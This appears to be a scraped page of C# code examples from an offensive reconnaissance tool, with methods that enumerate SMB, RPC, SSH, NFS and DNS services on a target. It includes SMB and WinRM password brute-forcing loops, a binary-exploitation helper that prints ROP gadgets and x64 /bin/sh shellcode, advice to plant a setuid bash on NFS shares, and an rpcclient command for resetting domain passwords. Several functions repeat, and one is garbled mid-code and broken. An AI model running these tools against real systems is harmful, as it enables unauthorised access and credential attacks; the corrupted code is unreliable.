Beispiel #1
0
        private static string QueryEnumDomUser(string ip, string user)
        {
            string returnInfo = "";
            // Console.WriteLine("Debug Output: " + user);
            // user:[Guest] rid:[0x1f5]
            string userName = user.Remove(0, user.IndexOf("[") + 1);

            userName = userName.Substring(0, userName.IndexOf("]"));

            returnInfo += "-- " + userName + Environment.NewLine;

            List <string> infoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"queryuser " + userName + "\"");

            foreach (string info in infoList)
            {
                // padding1[0..7]...
                // logon_hrs[0..21]..
                if (!info.Contains(":"))
                {
                    return(returnInfo);
                }
                string description = info.Substring(0, info.IndexOf(":"));
                description = description.Trim();
                string value = info.Remove(0, info.IndexOf(":") + 1);
                value = value.Trim();
                if (description == "Full Name" || description == "Home Drive" || description == "Comment" || description == "Description")
                {
                    if (value != "")
                    {
                        returnInfo += "--- " + description + ": " + value + Environment.NewLine;
                    }
                }
            }
            return(returnInfo.Trim(Environment.NewLine.ToCharArray()));
        }
Beispiel #2
0
 private static string TestAnonymousAccess_Linux(string target)
 {
     if (General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
     {
         string        smbClientItems = "";
         List <string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth
         if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED"))
         {
             return("- No Anonymous Access");
         }
         else if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
         {
             return("- It connected, but instantly disconnected you");
         }
         else if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available")
         {
             return("- Anonymous Access Allowed - But No Shares Found");
         }
         else if (processResults.Count >= 1 && processResults[0].Contains("NT_STATUS_IO_TIMEOUT"))
         {
             return("- Timed out :(");
         }
         foreach (string item in processResults)
         {
             // type|name|comment
             if (item.Trim() != "SMB1 disabled -- no workgroup available" && item.Trim() != "Anonymous login successful")
             {
                 try
                 {
                     string itemType    = item.Split('|')[0];
                     string itemName    = item.Split('|')[1];
                     string itemComment = item.Split('|')[2];
                     smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine;
                     List <string> subProcessResults = General.GetProcessOutput("smbclient", $"//{target}/{itemName} --no-pass -c \"ls\"");
                     if (subProcessResults.Count > 1 && !subProcessResults.Any(x => x.Contains("NT_STATUS_ACCESS_DENIED") || x.Contains("NT_STATUS_OBJECT_NAME_NOT_FOUND")))
                     {
                         smbClientItems += "-- " + $"{itemName} has ls perms - {subProcessResults.Count} items found! -> smbclient //{target}/{itemName} --no-pass".Pastel(Color.Orange) + Environment.NewLine;
                     }
                 }
                 catch (Exception ex)
                 {
                     if (ex.Message.Contains("NT_STATUS_IO_TIMEOUT"))
                     {
                         smbClientItems = "-- Timeout - Try later :(" + Environment.NewLine;
                     }
                     else
                     {
                         Console.WriteLine($"TestAnonymousAccess_Linux - Error: {ex.Message} - Invalid item: {item} - Bug Reelix!");
                     }
                 }
             }
         }
         return(smbClientItems.Trim(Environment.NewLine.ToCharArray()));
     }
     else
     {
         return("- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red));
     }
 }
Beispiel #3
0
        // Get Auth Methods
        public static string GetAuthMethods(string ip, int port)
        {
            string returnString = "";

            if (string.IsNullOrEmpty(ip))
            {
                Console.WriteLine("Error in ssh.GetAuthMethods - Missing IP");
                return("");
            }
            List <string> outputLines = General.GetProcessOutput("ssh", $"-o PreferredAuthentications=none -o StrictHostKeyChecking=no -o ConnectTimeout=5 {ip} -p {port}");

            // kex_exchange_identification: read: Connection reset by peer
            if (outputLines.Count == 1 && outputLines[0].EndsWith("Connection refused"))
            {
                return("- Port is closed");
            }
            if (outputLines.Count == 1 && outputLines[0].Contains("no matching key exchange method found. Their offer:"))
            {
                return("- Weird Auth Method: " + outputLines[0]);
            }
            if (outputLines.Count == 1 && outputLines[0].Trim() == "kex_exchange_identification: Connection closed by remote host")
            {
                return("- They have no auth methods to give you");
            }
            if (outputLines.Contains("kex_exchange_identification: read: Connection reset by peer"))
            {
                returnString = "- Port is open, but connection reset with no info :(";
                return(returnString);
            }
            if (!outputLines.Any(x => x.Contains("Permission denied")))
            {
                if ((outputLines.Count == 1 || outputLines.Count == 2) && outputLines[0].Contains("Connection timed out"))
                {
                    return("Timed out :(");
                }
                else
                {
                    Console.WriteLine("Error in ssh.GetAuthMethods - No Permission denied found");
                    foreach (string line in outputLines)
                    {
                        Console.WriteLine($"Debug: --> {line}");
                    }
                    return("");
                }
            }
            returnString = outputLines.First(x => x.Contains("Permission denied"));
            returnString = returnString.Remove(0, returnString.IndexOf("("));
            returnString = returnString.Replace("(", "").Replace(")", "");
            // ssh - oPreferredAuthentications = none - oStrictHostKeyChecking = no 10.10.10.147

            // [email protected]: Permission denied(publickey, password).
            // [email protected]: Permission denied (publickey,keyboard-interactive).
            return(returnString);
        }
Beispiel #4
0
        private static List <string> RunCommand(string ip, string command, bool signing)
        {
            List <string> processOutput = new List <string>();

            if (signing)
            {
                processOutput = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"{command}\"");
            }
            else
            {
                processOutput = General.GetProcessOutput("rpcclient", $"-S off -U \"anonymous\"%\"\" {ip} -c \"{command}\"");
            }
            return(processOutput);
        }
Beispiel #5
0
        public static string GetInfo(string ip)
        {
            string toReturn = "";

            if (General.GetOS() == General.OS.Linux)
            {
                if (General.IsInstalledOnLinux("svn"))
                {
                    // svn info svn://ip - Anything super useful?
                    string        processOutput = string.Join("|", General.GetProcessOutput("svn", "log svn://" + ip));
                    List <string> commitList    = processOutput.Split(new[] { "------------------------------------------------------------------------" }, StringSplitOptions.None).ToList();
                    commitList.RemoveAll(string.IsNullOrEmpty);
                    foreach (string commit in commitList)
                    {
                        List <string> splitItems = commit.Split('|').ToList();
                        splitItems.RemoveAll(string.IsNullOrEmpty);
                        // 0 - Revision
                        // 1 - Name
                        // 2 - Date
                        // 3 - Lines (?)
                        // 4 - Comment
                        try
                        {
                            string commitRevision = splitItems[0].Trim();
                            int    commitDiff     = int.Parse(commitRevision.Replace("r", "")) - 1; // Indexes - How do they work!
                            string commitName     = splitItems[1].Trim();
                            string commitDate     = splitItems[2];
                            string commitLines    = splitItems[3];
                            string commitComments = splitItems[4];
                            string commitInfo     = "- Commit " + commitRevision + " by " + commitName + " - " + commitComments + " ( svn diff -r" + commitDiff + " svn://" + ip + " )";
                            toReturn += commitInfo + Environment.NewLine;
                        }
                        catch (Exception ex)
                        {
                            toReturn += "- Conversion Error: " + ex.Message + Environment.NewLine;
                        }
                    }
                    toReturn = toReturn.Trim(Environment.NewLine.ToCharArray());
                }
                else
                {
                    Console.WriteLine("svn is not installed - Skipping enumeration (You probably want to 'svn install subversion')");
                }
            }
            else
            {
                Console.WriteLine("svn.GetInfo currently lacks Windows support. Bug Reelix.");
            }
            return(toReturn);
        }
Beispiel #6
0
        public static string GetInfo(string target, int port)
        {
            string toReturn = "";

            if (!General.IsInstalledOnLinux("rpcinfo"))
            {
                toReturn = "- " + "Error: Cannot find rpcinfo - Unable to enumerate - install rpcbind".Pastel(Color.Red);
            }
            else
            {
                List <string> processOutput = General.GetProcessOutput("rpcinfo", "-p " + target);
                foreach (string item in processOutput)
                {
                    toReturn += "- " + item + Environment.NewLine;
                }
            }
            return(toReturn.Trim(Environment.NewLine.ToCharArray()));
        }
Beispiel #7
0
        public static string GetInfo(string ip, int port)
        {
            // https://raymii.org/s/tutorials/Get_DNS_server_version_and_hide_it_in_BIND.html
            string        dnsInfo     = "";
            List <string> outputLines = General.GetProcessOutput("nslookup", $"-type=txt -class=chaos version.bind {ip}");

            if (outputLines.Count > 0 && outputLines[0].Trim() == "*** Request to UnKnown timed-out")
            {
                dnsInfo = "- No Info Available";
            }
            else
            {
                foreach (string line in outputLines)
                {
                    dnsInfo += $"- {line}" + Environment.NewLine;
                }
            }
            dnsInfo = dnsInfo.Trim(Environment.NewLine.ToCharArray());
            return(dnsInfo);
        }
Beispiel #8
0
 private static string TestAnonymousAccess_Linux(string target)
 {
     if (General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient"))
     {
         string        smbClientItems = "";
         List <string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth
         if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED"))
         {
             return("- No Anonymous Access");
         }
         else if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED"))
         {
             return("- It connected, but instantly disconnected you");
         }
         else if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available")
         {
             return("- Anonymous Access Allowed - But No Shares Found");
         }
         foreach (string item in processResults)
         {
             // type|name|comment
             if (!item.StartsWith("SMB1 disabled"))
             {
                 string itemType    = item.Split('|')[0];
                 string itemName    = item.Split('|')[1];
                 string itemComment = item.Split('|')[2];
                 smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine;
                 List <string> subProcessResults = General.GetProcessOutput("smbclient", $"//{target}/{itemName} --no-pass -c \"ls\"");
                 if (subProcessResults.Count > 1)
                 {
                     smbClientItems += "-- " + $"{itemName} has ls perms! -> smbclient //{target}/{itemName} --no-pass".Pastel(Color.Orange) + Environment.NewLine;
                 }
             }
         }
         return(smbClientItems.Trim(Environment.NewLine.ToCharArray()));
     }
     else
     {
         return("- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red));
     }
 }
Beispiel #9
0
        private static void WinRMBrute_Windows(string ip, string userFile, string passFile)
        {
            List <string> userList = File.ReadAllLines(userFile).ToList();
            List <string> passList = File.ReadAllLines(passFile).ToList();

            // Perms
            List <string> permLines = General.GetProcessOutput("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts " + ip + " -Force");

            if (permLines.Count != 0)
            {
                if (permLines[0].Trim() == "Set-Item : Access is denied.")
                {
                    Console.WriteLine("You need to run Reecon in an Administrative console for this functionality");
                    return;
                }
            }
            foreach (string user in userList)
            {
                foreach (string pass in passList)
                {
                    Console.Write("Testing " + user + ":" + pass + " - ");
                    List <string> processResult = General.GetProcessOutput("powershell", "$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ('" + user + "', (ConvertTo-SecureString \"" + pass + "\" -AsPlainText -Force)); Test-WSMan -ComputerName " + ip + " -Credential $creds -Authentication Negotiate -erroraction SilentlyContinue");
                    if (processResult.Count != 0)
                    {
                        Console.ForegroundColor = ConsoleColor.Green;
                        Console.WriteLine("Success!");
                        Console.ForegroundColor = ConsoleColor.White;
                    }
                    else
                    {
                        Console.ForegroundColor = ConsoleColor.Red;
                        Console.WriteLine("Failed");
                        Console.ForegroundColor = ConsoleColor.White;
                    }
                }
            }
            General.RunProcess("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts '' -Force");
        }
Beispiel #10
0
        private static void ScanFile(string fileName)
        {
            if (!fileName.StartsWith("./"))
            {
                Console.WriteLine("fileName must start with ./");
                return;
            }

            Architecture architecture = IDElf(fileName);

            if (architecture == Architecture.x86)
            {
                Console.WriteLine("Architecture: x86");
                // You can get a segfault address of x86 programs by going
                // dmesg | tail -2 (Sometimes the last entry isn't for it)
                // dmesg | grep "ret2win32" | tail -1

                // pwn cyclic 500
                // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
                General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
                List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
                foreach (string item in dmesgOutput)
                {
                    //  segfault at 6161616c ip 000000006161616c x
                    if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
                    {
                        Console.WriteLine("- Cyclic Segfault: " + item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9));
                    }
                }
            }
            else if (architecture == Architecture.x64)
            {
                Console.WriteLine("Architecture: x64");
                // TODO: Find where it segfaults, -1
            }
            else
            {
                Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
            }

            if (General.IsInstalledOnLinux("ropper"))
            {
                List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace(": ret;", "");
                        if (pwnItem.Length == 18) // x64
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
                    }
                }

                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
                    {
                        string pwnItem = item.Trim();;
                        pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
                        if (pwnItem.Length == 18)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 18 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
                    }
                }
                ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
                foreach (string item in ropperOutput)
                {
                    if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
                    {
                        string pwnItem = item.Trim();
                        pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
                        if (pwnItem.Length == 10)
                        {
                            pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
                            // 0x16 - x64 address
                        }
                        else
                        {
                            Console.WriteLine("Not 10 - " + pwnItem.Length);
                        }
                        Console.WriteLine("- /bin/sh --> " + pwnItem);
                    }
                }
                // // ropper --file sudo_pwn_file_here --string "/bin/sh"
            }
            else
            {
                Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
            }
            if (General.IsInstalledOnLinux("rabin2"))
            {
                List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
                foreach (string item in rabin2Output)
                {
                    if (item.Trim().StartsWith("nx") && item.Contains("false"))
                    {
                        Console.WriteLine("- nx is disabled - You can run your own shellcode!");
                        if (architecture == Architecture.x64)
                        {
                            Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
                        }
                        else
                        {
                            // http://shell-storm.org/shellcode/
                            Console.WriteLine("Bug Reelix to fix his code!");
                        }
                    }
                    else if (item.Trim().StartsWith("nx") && item.Contains("true"))
                    {
                        Console.WriteLine("- nx is enabled - No custom shellcode for you!");
                    }
                }
            }
            else
            {
                Console.WriteLine("- rabin2 is not installed - Skipping nx check");
            }
            if (General.IsInstalledOnLinux("objdump"))
            {
                List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
                foreach (string item in objdumpOutput)
                {
                    if (item.Contains("call") && item.Contains("system")) // callq contains call
                    {
                        Console.WriteLine("- system --> " + item);
                    }
                    if (item.Trim().EndsWith(" <puts@plt>:"))
                    {
                        Console.WriteLine("- puts@plt (plt_puts) --> " + item);
                    }
                    if (item.Contains("puts@GLIBC"))
                    {
                        Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
                    }
                }

                objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
                foreach (string item in objdumpOutput)
                {
                    // .text = Name
                    // " g" = Global
                    if (item.Contains(".text") && item.Contains(" g "))
                    {
                        Console.WriteLine("- Useful Symbol: " + item);
                    }
                }
                // objdump -t ./file.elf | grep .text
            }
            else
            {
                Console.WriteLine("- objdump is not installed - Skipping syscalls");
            }
            Console.WriteLine("Finished");
        }
Beispiel #11
0
        public static string GetInfo(string target, int port)
        {
            // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse

            string fileList = "";

            if (General.GetOS() == General.OS.Windows)
            {
                if (File.Exists(@"C:\Windows\System32\showmount.exe"))
                {
                    List <string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target);
                    if (outputLines.Count > 1)
                    {
                        outputLines.RemoveAt(0);
                        fileList = "- Files:" + Environment.NewLine;
                        foreach (string line in outputLines)
                        {
                            fileList += "-- " + line + Environment.NewLine;
                        }
                        fileList  = fileList.Trim(Environment.NewLine.ToCharArray());
                        fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
                    }
                    fileList = fileList.Trim(Environment.NewLine.ToCharArray());
                    return(fileList);
                }
                else
                {
                    fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility";
                    return(fileList);
                }
            }
            else if (General.GetOS() == General.OS.Linux)
            {
                if (General.IsInstalledOnLinux("showmount")) // "/sbin/showmount" OR "/usr/sbin/showmount"
                {
                    List <string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target);
                    foreach (string line in showmountOutput)
                    {
                        // https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash

                        // NFS V1
                        if (line.Trim().EndsWith("*"))
                        {
                            fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                            fileList += "-- NFSV1 -> " + "sudo mount -t nfs {target}:/mountNameHere /tmp/mount/ -nolock".Pastel(Color.Orange) + Environment.NewLine;
                            fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
                        }
                        // NFS V2
                        else if (line.Contains(" (everyone)"))
                        {
                            fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine;
                            fileList += "-- NFSV2 -> " + $"sudo mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine;
                            fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine;
                        }
                        else
                        {
                            fileList += "- " + line + Environment.NewLine;
                        }
                    }
                    return(fileList.Trim(Environment.NewLine.ToCharArray()));

                    //
                    // Windows
                    //

                    // ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2

                    /*
                     * ManagementClass objMC = new ManagementClass("Win32_OptionalFeature");
                     * ManagementObjectCollection objMOC = objMC.GetInstances();
                     * foreach (ManagementObject objMO in objMOC)
                     * {
                     *  //Console.WriteLine("Woof!");
                     *  string featureName = (string)objMO.Properties["Name"].Value;
                     *  if (!featureName.ToUpper().Contains("NFS"))
                     *  {
                     *      continue;
                     *  }
                     *  uint installState = 0;
                     *  try
                     *  {
                     *      installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown
                     *  }
                     *  catch
                     *  {
                     *      Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value);
                     *  }
                     *
                     *  //add to my list
                     *  Console.WriteLine("Installed: " + featureName + " -> " + installState);
                     * }
                     */
                }
                else
                {
                    return("- Error - showmount is not installed - Unable to enumerate! Run: sudo apt install nfs-common".Pastel(Color.Red));
                }
            }
            else
            {
                Console.WriteLine("Error - OS Not Supportd - Bug Reelix");
            }
            return("");
        }
Beispiel #12
0
        public static void SMBBrute(string[] args)
        {
            // TODO: This still shows "Success" if:
            // - The username doesn't exist
            // - There is a space in the password
            if (!RuntimeInformation.IsOSPlatform(OSPlatform.Linux))
            {
                Console.WriteLine("SMB Brute only currently works in Linux - Heh :p");
                return;
            }
            if (args.Length != 4)
            {
                Console.WriteLine("SMB Brute Usage: reecon -smb-brute IP Userfile Passfile");
                return;
            }
            string ip       = args[1];
            string userFile = args[2];
            string passFile = args[3];

            if (!File.Exists(userFile))
            {
                Console.WriteLine("Unable to find UserFile: " + userFile);
                return;
            }
            if (!File.Exists(passFile))
            {
                Console.WriteLine("Unable to find Passfile: " + passFile);
                return;
            }
            List <string> userList = File.ReadAllLines(userFile).ToList();
            List <string> passList = File.ReadAllLines(passFile).ToList();

            foreach (string user in userList)
            {
                foreach (string pass in passList)
                {
                    List <string> outputResult = General.GetProcessOutput("smbclient", @"-L \\\\" + ip + " -U" + user + "%" + pass);
                    outputResult.RemoveAll(x => x.Equals("Unable to initialize messaging context"));
                    string resultItem = outputResult[0];
                    if (resultItem.Contains("NT_STATUS_HOST_UNREACHABLE"))
                    {
                        Console.WriteLine("Error - Unable to contact \\\\" + ip);
                        return;
                    }
                    else if (resultItem.Contains("NT_STATUS_LOGON_FAILURE"))
                    {
                        Console.WriteLine(user + ":" + pass + " - Failed");
                    }
                    else if (resultItem.Contains("NT_STATUS_UNSUCCESSFUL"))
                    {
                        Console.WriteLine("Fatal Error: " + resultItem);
                        return;
                    }
                    else
                    {
                        Console.WriteLine(user + ":" + pass + " - Success!");
                        return;
                    }
                }
            }
            // smbclient -L \\\\10.10.10.172 -USABatchJobs%SABatchJobs
        }
Beispiel #13
0
        private static string GetRPCInfo(string ip)
        {
            string rpcInfo    = "";
            bool   anonAccess = false;

            if (General.GetOS() == General.OS.Linux)
            {
                if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient"))
                {
                    // Find the Domain Name
                    List <string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\"");
                    domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:"));
                    if (domainNameList.Count == 1)
                    {
                        anonAccess = true;
                        rpcInfo   += "- " + domainNameList[0] + Environment.NewLine;
                    }

                    // Find basic users
                    List <string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\"");
                    if (enumdomusersList.Count == 0)
                    {
                        List <string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\"");
                        if (srvinfoList.Count != 0)
                        {
                            anonAccess = true;
                            rpcInfo   += "- srvinfo: " + srvinfoList[0] + Environment.NewLine;
                        }

                        // Find public SIDs with lsaenumsid
                        List <string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\"");
                        if (sidList.Count != 0)
                        {
                            anonAccess = true;
                            rpcInfo   += "- Found SIDs" + Environment.NewLine;
                            // Remove the "found X SIDs" text
                            sidList.RemoveAll(x => x.StartsWith("found "));

                            // Remove blanks
                            sidList.RemoveAll(x => string.IsNullOrEmpty(x));

                            string sidListString = string.Join(' ', sidList);

                            // Enumerate the rest
                            List <string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\"");
                            if (sidResolution.Count != 0)
                            {
                                foreach (string result in sidResolution)
                                {
                                    rpcInfo += "-- " + result + Environment.NewLine;
                                }
                            }
                        }

                        // Find sneaky SIDs
                        List <string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none");
                        sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1);
                                    if (!sneakySIDBaseList.Contains(sneakySIDBase))
                                    {
                                        sneakySIDBaseList.Add(sneakySIDBase);
                                    }
                                }
                            }

                            if (sneakySIDBaseList.Count != 0)
                            {
                                List <string> sneakySIDList = new List <string>();
                                foreach (string sneakyBase in sneakySIDBaseList)
                                {
                                    // Low ones are just system names - Can ignore them - Proper ones start from 1000
                                    sneakySIDList.Add(sneakyBase + "1000");
                                    sneakySIDList.Add(sneakyBase + "1001");
                                    sneakySIDList.Add(sneakyBase + "1002");
                                    sneakySIDList.Add(sneakyBase + "1003");
                                    sneakySIDList.Add(sneakyBase + "1004");
                                    sneakySIDList.Add(sneakyBase + "1005");
                                    sneakySIDList.Add(sneakyBase + "1006");
                                    sneakySIDList.Add(sneakyBase + "1007");
                                    sneakySIDList.Add(sneakyBase + "1008");
                                    sneakySIDList.Add(sneakyBase + "1009");
                                    sneakySIDList.Add(sneakyBase + "1010");
                                    List <string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\"");
                                    if (sneakySIDLookup.Count != 0)
                                    {
                                        foreach (string lookupResult in sneakySIDLookup)
                                        {
                                            string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)"));

                                            name = name.Remove(0, name.LastIndexOf("\\") + 1);

                                            // Invalid ones simply have the number itself instead of the name
                                            // A bit hacky, but it works
                                            if (!int.TryParse(name, out int toIgnore))
                                            {
                                                rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine;
                                            }
                                        }
                                    }
                                }
                            }
                        }
                    }
                    else // Count > 0
                    {
                        string firstItem = enumdomusersList[0];
                        if (firstItem.Contains("user:"******"rid:"))
                        {
                            // All is fine
                            if (enumdomusersList.Count >= 3)
                            {
                                Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected");
                            }
                            rpcInfo = "- User Listing" + Environment.NewLine;
                            foreach (string user in enumdomusersList)
                            {
                                rpcInfo += QueryEnumDomUser(ip, user);
                            }
                            // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                            rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND")
                        {
                            rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT")
                        {
                            rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine;
                        }
                        else if (firstItem == "Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED")
                        {
                            rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine;
                        }
                        else
                        {
                            foreach (string item in enumdomusersList)
                            {
                                Console.WriteLine("Debug Info item: " + item);
                            }
                            rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine;
                        }
                    }
                    if (anonAccess == true)
                    {
                        rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine;
                    }
                    else
                    {
                        rpcInfo += "- No anonymous RPC access" + Environment.NewLine;
                        // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/
                        rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine;
                    }
                }
                else
                {
                    rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine;
                }
            }
            else
            {
                rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine;
            }
            return(rpcInfo);
        }
Beispiel #14
0
        public static string GetInfo(string target, int port)
        {
            // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse

            string fileList = "";

            if (General.GetOS() == General.OS.Windows)
            {
                if (File.Exists(@"C:\Windows\System32\showmount.exe"))
                {
                    List <string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target);
                    if (outputLines.Count > 1)
                    {
                        outputLines.RemoveAt(0);
                        fileList = "- Files:" + Environment.NewLine;
                        foreach (string line in outputLines)
                        {
                            fileList += "-- " + line + Environment.NewLine;
                        }
                        fileList  = fileList.Trim(Environment.NewLine.ToCharArray());
                        fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:";
                    }
                    fileList = fileList.Trim(Environment.NewLine.ToCharArray());
                    return(fileList);
                }
                else
                {
                    fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility";
                    return(fileList);
                }
            }
